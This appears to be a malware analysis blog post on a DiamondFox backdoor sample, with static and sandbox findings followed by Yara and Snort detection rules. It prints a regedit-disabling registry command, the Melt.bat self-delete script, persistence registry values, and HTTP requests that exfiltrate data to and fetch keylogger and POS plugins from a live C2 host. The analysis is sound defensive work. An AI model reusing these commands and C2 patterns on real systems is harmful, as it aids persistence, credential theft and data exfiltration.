Source: VirusShare Malware Family: Backdoor, Implant, RAM Scraper Static Analysis Tools: pestudio, Immunity Debugger, CFF Explorer, PEID, BinText, IDA Pro Dynamic Analysis Tools: pexplorer, ProcMon, RegShot, ProcDump, Autoruns, Wireshark, Sandboxie, VMWare, Comodo, Payload Security Sandbox Reports: (1) Comodo: http://camas.comodo.com/cgi-bin/submit?file=4dae7fcde64a7ed61c51b17a57ffd2510381271a53d59beee730f59ae6c75352 (2) VirusTotal: https://www.virustotal.com/en/file/74fe8c68d878cc9699a2781be515bb003931ffa2ad21dc0c2c48eb91caba4b44/analysis/1450745229/ I . Static Analysis: Filename: loader.exe File Type: Win32 EXE Original Name: лиса. Dll [“fox” in Russian] Product: NT Kernel & System Target machine: Intel 386 or later processors and compatible processors Compilation Timestamp: 2015-06-18 04:37:16 Entry Point: 0x000011FC Subsystem: Windows GUI Number of Sections: 3 File Info: Microsoft Visual Basic 6.0 (when unpacked) MD5: 6b5f4ffa711a2d1e4f27455f6d0f09ad SHA256: 4dae7fcde64a7ed61c51b17a57ffd2510381271a53d59beee730f59ae6c75352 File size: 80.0 KB (81920 bytes) PE imports: [+] MSVBVM60.DLL (Microsoft Visual Basic Library) PE resources by language: ARABIC NEUTRAL (SYRIA) Red Flags: The count (95) of blacklisted strings reached the maximum (30) threshold. The Offset (0x00000000) of the Bound Import Directory is outside a section. The file contains 1 resource(s) in a blacklisted language (Syria). The count (1) of imported libraries reached the minimum (3) threshold. The count (12) of imported blacklisted functions reached the maximum (1) threshold. The file references child Processes. The file ignores Data Execution Prevention (DEP) as mitigation technique. The file ignores Address Space Layout Randomization (ASLR) as mitigation technique. The file runs in the Visual Basic Virtual Machine. The original filename is different than the file name (loader). The file ignores cookies on the stack (GS) as mitigation technique. The file is not signed with a Digital Certificate. Here some interesting strings: *Anti-Sysanalizer: Protect the bot against Sysanalizer. *Anti-VirtualBox: Protect the bot against Virtual Box Emulation. *Anti-VMWare: Protect the bot against VMWare Emulation. *Anti-Anubis: Protect the bot against Anubis Online Analyzer. *Anti-OllyDBG: Protect the bot against be analyzed with OllyDBG. *Anti-Sandboxie: Protect the bot against be executed in Sandboxie. *Anti-Malwr.com: Protect the bot against Malwr.com Online Analyzer. *Anti-Wine: Protect the bot against Linux emulation. *Anti-Norman: Protect the bot against Norman Sandbox. *Disable Regedit: Disable the registry editor. reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword /d "1" /f II. Dynamic Analysis: Incident Response Remote Access Contains ability to listen for incoming connections Spyware/Leak POSTs files to a webserver Persistence Modifies auto-execute functionality by setting/creating a value in the registry Fingerprint Reads the cryptographic machine GUID Contains ability to lookup the windows account name Network Behavior Contacts 1 domain and 1 host. Install Path: ~APPDATA ~Temp ~Program Files ~WinDir StartUp: ~HKCY ~WinLogon ~Startup Platform IntelligenceReport Behavior Comparison Sample contains signature combinations unique to malicious reports combo Writes data to a remote process Sets the process error mode to suppress error box Modifies the UAC/LUA settings (Account Control) relevance Seen 68 times before on malicious reports combo Writes data to a remote process Allocates virtual memory in foreign process Modifies the UAC/LUA settings (Account Control) relevance Seen 43 times before on malicious reports combo Uses a User Agent typical for browsers, although no browser was ever launched Creates/touches files in windows directory Writes data to a remote process relevance Seen 41 times before on malicious reports combo Writes data to a remote process Drops a batch file that contains a force-delete command (typical for malware init code) Sets the process error mode to suppress error box relevance Seen 35 times before on malicious reports combo Marks file for deletion Writes data to a remote process Modifies the UAC/LUA settings (Account Control) relevance Seen 21 times before on malicious reports combo Accesses potentially sensitive information from local browsers Creates/touches files in windows directory Writes data to a remote process relevance Seen 19 times before on malicious reports notice ... and at least 10 more combinations Installation/Persistence Allocates virtual memory in foreign process details "<Input Sample>" allocated 00000088 bytes of memory in "cmd.exe" (Protection: "read/write") "svchost.exe" allocated 00000088 bytes of memory in "ntvdm.exe" (Protection: "read/write") source API Call Writes a PE file header to disc details "<Input Sample>" wrote 65024 bytes starting with PE header signature to file "%APPDATA%\svchost.exe": 4d5a90000300000004000000ffff0000b8000000000000004000000000000000000000000000000000000000000000000000 ... "svchost.exe" wrote 65024 bytes starting with PE header signature to file "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WordPad.exe": 4d5a90000300000004000000ffff0000b8000000000000004000000000000000000000000000000000000000000000000000 ... "svchost.exe" wrote 65024 bytes starting with PE header signature to file "C:\Users\%USERNAME%\AppData\Roaming\dwm.exe": 4d5a90000300000004000000ffff0000b8000000000000004000000000000000000000000000000000000000000000000000 ... source API Call Writes data to a remote process details "<Input Sample>" wrote 32 bytes to a foreign process "svchost.exe" (PID: 00002164) "<Input Sample>" wrote 52 bytes to a foreign process "svchost.exe" (PID: 00002164) "<Input Sample>" wrote 4 bytes to a foreign process "svchost.exe" (PID: 00002164) "svchost.exe" wrote 32 bytes to a foreign process "ntvdm.exe" (PID: 00003132) "svchost.exe" wrote 52 bytes to a foreign process "ntvdm.exe" (PID: 00003132) "svchost.exe" wrote 4 bytes to a foreign process "ntvdm.exe" (PID: 00003132) source API Call Spyware/Information Retrieval Accesses potentially sensitive information from local browsers details "svchost.exe" had access to "%LOCALAPPDATA%\Microsoft\Windows\History\History.IE5" (Type: "FileHandle", Context: "NtSetInformationFile") source Touched Handle Suspicious Indicators Anti-Detection/Stealthyness Possibly checks for the presence of an Antivirus engine details "No Antivirus" (Indicator: "antivirus") "ANTIVIRUS" (Indicator: "antivirus") source String Sets the process error mode to suppress error box details "<Input Sample>" set its error mode to SEM_NOOPENFILEERRORBOX "svchost.exe" set its error mode to SEM_NOOPENFILEERRORBOX source API Call Environment Awareness Contains ability to query the machine version details [email protected] Reads the cryptographic machine GUID details "<Input Sample>" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY", Key: "MACHINEGUID") "svchost.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY", Key: "MACHINEGUID") source Registry Access General POSTs files to a webserver details "POST /post.php?pl=&slots=1 HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=Xu02=$ Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 121 Host: locahost.com" with no payload "POST /post.php?pl=&slots=1 HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=Xu02=$ Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 122 Host: locahost.com" with no payload "POST /post.php?pl=&slots=1 HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=Xu02=$ Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 120 Host: locahost.com" with no payload source Network Traffic Reads configuration files details "svchost.exe" read file "C:\Users\desktop.ini" "svchost.exe" read file "C:\Users\%USERNAME%\desktop.ini" "svchost.exe" read file "C:\Users\%USERNAME%\Desktop\desktop.ini" "svchost.exe" read file "%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\desktop.ini" "svchost.exe" read file "C:\Users\%USERNAME%\Desktop\desktop.ini" "svchost.exe" read file "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini" "svchost.exe" read file "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini" "svchost.exe" read file "C:\Windows\Fonts\desktop.ini" "svchost.exe" read file "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini" source API Call Installation/Persistence Creates/touches files in windows directory details "svchost.exe" created file "%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu" "svchost.exe" created file "C:\ProgramData\Microsoft\Windows\Start Menu\Programs" "svchost.exe" created file "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini" "svchost.exe" created file "C:\Windows\Fonts\desktop.ini" "svchost.exe" created file "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini" "svchost.exe" created file "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini" "svchost.exe" created file "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu" "svchost.exe" created file "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs" "svchost.exe" created file "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WordPad.exe" "svchost.exe" created file "C:\Windows\system32\wshom.ocx" "svchost.exe" created file "C:\Windows\System32\msxml3.dll\1" "svchost.exe" created file "C:\Windows\System32\msxml3.dll" "svchost.exe" created file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files" "svchost.exe" created file "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Cookies" "svchost.exe" created file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\History" "svchost.exe" created file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat" "svchost.exe" created file "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Cookies\index.dat" source API Call Drops executable files details "svchost.exe" has type "PE32 executable (GUI) Intel 80386, for MS Windows" "WordPad.exe" has type "PE32 executable (GUI) Intel 80386, for MS Windows" "dwm.exe" has type "PE32 executable (GUI) Intel 80386, for MS Windows" source Dropped File Modifies auto-execute functionality by setting/creating a value in the registry details "svchost.exe" (Access type: "CREATE", Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN") "svchost.exe" (Access type: "SETVAL", Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN", Key: "SVCHOST", Value: "%APPDATA%\svchost.exe") "svchost.exe" (Access type: "SETVAL", Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON", Key: "USERINIT", Value: "C:\Windows\system32\Userinit.exe,C:\Users\%USERNAME%\AppData\Roaming\svchost.exe") source Registry Access Monitors specific registry key for changes details "svchost.exe" monitors "\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\Protocol_Catalog9" (Filter: 1, Subtree: 2147483648) "svchost.exe" monitors "\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinSock2\Parameters\NameSpace_Catalog5" (Filter: 1, Subtree: 2147483648) "svchost.exe" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\svchost_RASAPI32" (Filter: 14, Subtree: 2147483648) "svchost.exe" monitors "\REGISTRY\MACHINE\SOFTWARE\Microsoft\Tracing\svchost_RASMANCS" (Filter: 14, Subtree: 2147483648) source API Call Writes to a file to the start menu details "svchost.exe" wrote 65024 bytes to file "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\WordPad.exe": source: API Call Network Related Contains ability to listen for incoming connections details listen@WS2_32.DLL (Referenced in the context of a system call) [email protected] Uses a User Agent typical for browsers, although no browser was ever launched details Found user agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) source Network Traffic System Destruction Marks file for deletion details "%APPDATA%\svchost.exe" marked "C:\Users\%USERNAME%\AppData\Roaming\Flog.log" for deletion "C:\Users\%USERNAME%\AppData\Roaming\svchost.exe" marked "C:\Users\%USERNAME%\AppData\Roaming\Elog.log" for deletion "C:\Users\%USERNAME%\AppData\Roaming\svchost.exe" marked "C:\Users\%USERNAME%\AppData\Roaming\grabbed.log" for deletion source: API call Opens file with deletion access rights details "svchost.exe" opened "%APPDATA%\Flog.log" with delete access "svchost.exe" opened "C:\Users\%USERNAME%\AppData\Roaming\Elog.log" with delete access "svchost.exe" opened "C:\Users\%USERNAME%\AppData\Roaming\grabbed.log" with delete access source API Call System Security Modifies proxy settings details "svchost.exe" (Access type: "SETVAL", Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS", Key: "PROXYENABLE", Value: "00000000") "svchost.exe" (Access type: "DELETEVAL", Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS", Key: "PROXYSERVER") "svchost.exe" (Access type: "DELETEVAL", Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS", Key: "PROXYOVERRIDE") "svchost.exe" (Access type: "DELETEVAL", Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP", Key: "PROXYBYPASS") "svchost.exe" (Access type: "DELETEVAL", Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP", Key: "PROXYBYPASS") source Registry Access Informative Environment Awareness Executes WMI queries details "svchost.exe" issued a query "select * from win32_logicaldisk" source API Call General Contacts domains details "locahost.com" source Network Traffic Contacts server details "209.191.187.61:80" source Network Traffic Creates a writable file in a temporary directory details "<Input Sample>" created file "%TEMP%\Melt.bat" source API Call Creates mutants details "Local\_!MSFTHISTORY!_" "Local\c:!users!_____!appdata!local!microsoft!windows!temporary internet files!content.ie5!" "Local\c:!users!_____!appdata!roaming!microsoft!windows!cookies!" "Local\c:!users!_____!appdata!local!microsoft!windows!history!history.ie5!" "Local\WininetStartupMutex" "Local\WininetConnectionMutex" "Local\WininetProxyRegistryMutex" "Local\!IETld!Mutex" "Local\ZonesCounterMutex" "Local\ZoneAttributeCacheCounterMutex" "Local\ZonesCacheCounterMutex" "Local\ZonesLockedCacheCounterMutex" "IESQMMUTEX_0_208" source Created Mutant GETs files from a webserver details "GET /plugins/keylogger.p HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: locahost.com Connection: Keep-Alive" "GET /plugins/ftp.p HTTP/1.1 User-Agent: vb wininet Host: locahost.com" "GET /plugins/mail.p HTTP/1.1 User-Agent: vb wininet Host: locahost.com" "GET /plugins/passwords.p HTTP/1.1 User-Agent: vb wininet Host: locahost.com" "GET /plugins/POS.p HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: locahost.com Connection: Keep-Alive" source Network Traffic Loads modules at runtime details "svchost.exe" loaded module "API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL" at base 77B10000 "svchost.exe" loaded module "PROFAPI.DLL" at base 75AE0000 "svchost.exe" loaded module "PROPSYS.DLL" at base 74860000 "svchost.exe" loaded module "C:\WINDOWS\SYSTEM32\MSXML3.DLL" at base 6B9D0000 "svchost.exe" loaded module "%COMMONPROGRAMFILES%\SYSTEM\ADO\MSADO15.DLL" at base 6B8D0000 "svchost.exe" loaded module "URLMON.DLL" at base 76EE0000 "svchost.exe" loaded module "WININET.DLL" at base 76090000 "svchost.exe" loaded module "COMCTL32.DLL" at base 74960000 "svchost.exe" loaded module "SHELL32.DLL" at base 76290000 "svchost.exe" loaded module "VERSION.DLL" at base 750D0000 "svchost.exe" loaded module "RASAPI32.DLL" at base 73400000 "svchost.exe" loaded module "RTUTILS.DLL" at base 73FA0000 "svchost.exe" loaded module "RASMAN.DLL" at base 733E0000 "svchost.exe" loaded module "SHLWAPI.DLL" at base 75E10000 "svchost.exe" loaded module "SENSAPI.DLL" at base 70C10000 "svchost.exe" loaded module "RPCRT4.DLL" at base 77120000 source API Call Loads the visual basic runtime environment details "<Input Sample>" loaded module "%WINDIR%\system32\MSVBVM60.DLL" at 72940000 "svchost.exe" loaded module "C:\Windows\system32\MSVBVM60.DLL" at 72940000 source Loaded Module Runs shell commands details "cmd /c %TEMP%\Melt.bat" on 2015-12-23.19:32:39 source Monitored Target Spawns new processes details Spawned process "svchost.exe" with commandline "%APPDATA%\svchost.exe" (UID: 00118484-00002164) Spawned process "cmd.exe" with commandline "cmd /c %TEMP%\Melt.bat" (UID: 00129156-00001836) Spawned process "ntvdm.exe" with commandline "-i1" (UID: 00252968-00003132) source Monitored Target Installation/Persistence Contains ability to lookup the windows account name details [email protected] (Referenced in the context of a system call) [email protected] (Referenced in the context of a system call) Dropped files details "svchost.exe" has type "PE32 executable (GUI) Intel 80386, for MS Windows" "WordPad.exe" has type "PE32 executable (GUI) Intel 80386, for MS Windows" "Melt.bat" has type "DOS batch file, ASCII text, with CRLF line terminators" "ky.config" has type "data" "logger.p" has type "HTML document, ASCII text" "dwm.exe" has type "PE32 executable (GUI) Intel 80386, for MS Windows" "POS.exe" has type "HTML document, ASCII text" "scsE0EB.tmp" has type "ASCII text, with CRLF line terminators" "scsE10B.tmp" has type "DOS batch file, ASCII text, with CRLF line terminators" source Dropped File Found potential URL in binary/memory details Pattern match: "pagead2.googlesyndication.com/pagead/js/adsbygoogle.js" Pattern match: "http://locahost.com/plugins/POS.p" Pattern match: "http://localhost/plugins/POS.p" Pattern match: "http://localhost/" Pattern match: "http://twitter.com/samfosteriam" Pattern match: "http://www.amazon.com/exec/obidos/redirect-home/locahostcom-20" Pattern match: "http://www.amazon.com/exec/obidos/ASIN/0395714060/locahostcom-20" Pattern match: "http://www.cafeshops.com/locahost01/" Pattern match: "https://ssl" Pattern match: "http://locahost.com/plugins/keylogger.p" Pattern match: "http://localhost/plugins/keylogger.p" source String Here is Melt.bat script: @echo off del /F "Z:\loader.exe" del /F "C:\Users\_____\AppData\Local\Temp\Melt.bat" Oddity Here is the dump of “Pos.exe”: III. Yara Signature:
rule Backdoor_Win32_DiamondFox : Implant { meta: author = "Vitali Kremez" date = "2015-12-23" description = "Detected Gorynych DiamondFox Implant" hash0 = "6b5f4ffa711a2d1e4f27455f6d0f09ad" sample_filetype = "exe" strings: $string0 = "loader.exe" $string1 = "Melt.bat" $string2 = "<Panel>" wide $string3 = "VM_WINXP" wide $string4 = "plugins/keylogger.p" wide $string5 = "</ABox>" wide $string6 = "winmgmts:{impersonationlevel=impersonate}!\\\\.\\root\\$ $string7 = "<Time>" wide $string8 = "MY_PATH" $string9 = "cript.Sleep(2000)" $string10 = "</Boxie>" wide $string11 = "SHELL32" $string12 = "& chr(34)" wide $string13 = "</USB>" wide $string14 = "Shell.Application" wide $string15 = "CUSTOM" wide $string16 = "\\Armory\\" wide $string17 = "C_DATA" condition: 6 of ($string*) and filesize<81KB } Sourcefire Rule: alert tcp any any -> any 80 (msg:" DiamondFox Backdoor Alert"; flow:to_server,established; content:"/plugins/keylogger.p"; pcre:"/.*/plugins/.*/"; pcre:"/.*pl=\&slots.*/"; content: "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"; noncase ;classtype: Trojan-activity) Sourcefire Exfil Rule: alert tcp any any <> 209.191.187.61 80 (msg: "DiamondFox C2 Connect"; sid: 10002;)
0 Comments
Leave a Reply. |
AuthorVitali Kremez Archives
September 2016
Categories |